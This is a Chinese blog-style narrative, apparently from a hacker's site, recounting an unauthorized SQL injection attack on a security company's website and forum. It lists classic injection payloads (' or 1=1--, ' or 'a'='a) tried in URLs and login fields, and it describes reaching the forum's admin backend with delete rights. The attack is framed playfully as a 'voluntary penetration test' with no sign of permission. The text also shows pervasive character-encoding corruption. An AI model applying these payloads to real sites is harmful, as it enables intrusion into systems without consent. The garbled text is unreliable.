筆者一直都有經(jīng)常性地到一些安全方面的網(wǎng)站瞎逛的習(xí)慣的,最近因?yàn)橐淮螜C(jī)緣巧合之下通過鏈接來到廣州某個(gè)頗有名氣的網(wǎng)絡(luò)安全公司的網(wǎng)站。說實(shí)在的,這個(gè)網(wǎng)站好象挺多元化的,提供軟件下載之余,還有自己的論壇(嘿嘿,界面做得還真不賴嘛,不知道安全性如何呢?)。出于對(duì)其安全操守的好奇,小神決定義務(wù)為其做個(gè)的初步的“安全滲透測(cè)試”。開始時(shí)只是拿一些綜合性的網(wǎng)絡(luò)漏洞掃描工具(X-scan3.0、Nmap、Retina等等)進(jìn)行信息掃描,然后做個(gè)結(jié)果篩選,結(jié)果只查到對(duì)方開了TCP80端口(也就是說他們的服務(wù)器只提供了正常的HTTP服務(wù)),且無任何典型的漏洞....沒戲了,對(duì)方畢竟還是一間有些知名度的企業(yè)嘛(因?yàn)檫@篇文章的重點(diǎn)并不在此,所以用網(wǎng)絡(luò)漏洞掃描器作信息掃描這個(gè)步驟我就不在這里多作說明了)。就這樣放棄了嗎?沒那么容易...恰好小神最近在整理SQL Injection(SQL注入攻擊)方面的資料,既然現(xiàn)在有機(jī)會(huì)就再“勉為其難”地幫它測(cè)試一下吧:P
首先是下載系統(tǒng),隨便抽一個(gè)工具的下載地址:http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444'先測(cè)試一下對(duì)方有沒有過濾'(單引號(hào))...
再試試下面的url,看看能否返回正常的頁面...
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444"
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444' or 1=1--
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444" or 1=1--
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444' or 'a'='a
http://該安全公司的網(wǎng)址/某目錄/download/open.asp?id=3444" or "a"="a
都是返回“HTTP 500 - 內(nèi)部服務(wù)器錯(cuò)誤”,看來是又失敗了,不怕,我們還有希望...此時(shí)的希望只
能全部寄托在論壇上了...(下圖)
循序漸進(jìn),首先找來一條帖子的url(這一步筆者挑了:http://該安全公司的網(wǎng)址/論壇目錄/list.asp
?ltid=14這條URL)重復(fù)剛剛的行為:
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14'
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14"
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14' or 1=1--
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14" or 1=1--
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14' or 'a'='a
http://該安全公司的網(wǎng)址/論壇目錄/list.asp?ltid=14" or "a"="a
不過看來還是在吃白果...(如下圖所示)
除了地址欄,不要忘了還有論壇首頁的登陸框:
在“用戶名:”區(qū)域中輸入:
網(wǎng)***' or 1=1--
然后在“密碼:”區(qū)域中隨便輸入幾個(gè)密碼看看吧:P(得到下圖)
還是不行,試試在密碼區(qū)域進(jìn)行注入攻擊吧...具體操作:
在“用戶名:”中輸入:
“網(wǎng)***”
然后在“密碼:”中輸入:
' or 1=1--
(提交后得到下圖)
fail...再用:
' or 1=1--
" or 1=1--
or 1=1--
' or 'a'='a
" or "a"="a
切換了幾次,還是不行,看來真的是“堅(jiān)不可摧”了...“風(fēng)繼續(xù)吹,不忍遠(yuǎn)離...”小神的MP3里哼著‘哥哥’張國榮的歌,難道就這樣離開嗎?到論壇的首頁里再逛一圈吧....一掃眼,還真道靈光,注意一下論壇登陸區(qū)域上方的小鏈接,看到了吧?第三條鏈接是什么呢?
單擊后跳出如下圖所示的登陸窗口:
首先在“論壇:”這一攔選中相應(yīng)的版面(這里筆者挑了第一個(gè)版面“安全工具”),然后再重新嘗試一下:
帳號(hào): 網(wǎng)***' or 1=1--
密碼: 任意密碼
不行,再試試:
帳號(hào): 網(wǎng)***
密碼: ' or 1=1--
......
......
小神的手顫了一下,只因“有顏色的界面”出來了:
開始時(shí)以為是假象,連忙點(diǎn)擊“進(jìn)入后臺(tái)>>>”...
這次看來是真的了,點(diǎn)擊其中一條帖子再測(cè)試一下:
(看到了吧?有“刪除”按鈕了也...其實(shí)我們可以做的還不只這些...PS:小神可是個(gè)好孩子哦^_^)寫到這里,也算是有個(gè)交代了吧?!^@@^
整篇文章的主旨也不過就是介紹了如何簡(jiǎn)單地利用SQL注入攻擊滲透論壇吧,其實(shí)現(xiàn)在再談SQL注入也是老生常談了,但想不到連知名的網(wǎng)絡(luò)安全公司也有這樣的漏洞,歸根結(jié)底就是人們對(duì)安全意識(shí)的不重視而引起的,這篇文章告訴了我們:不要忽視運(yùn)作中的一些小細(xì)節(jié)。
若想了解更多SQL注入技巧的相關(guān)信息歡迎登陸筆者的網(wǎng)站http://demonalex.cn.st或email:demonalex@hackermail.com與我聯(lián)系吧:)。














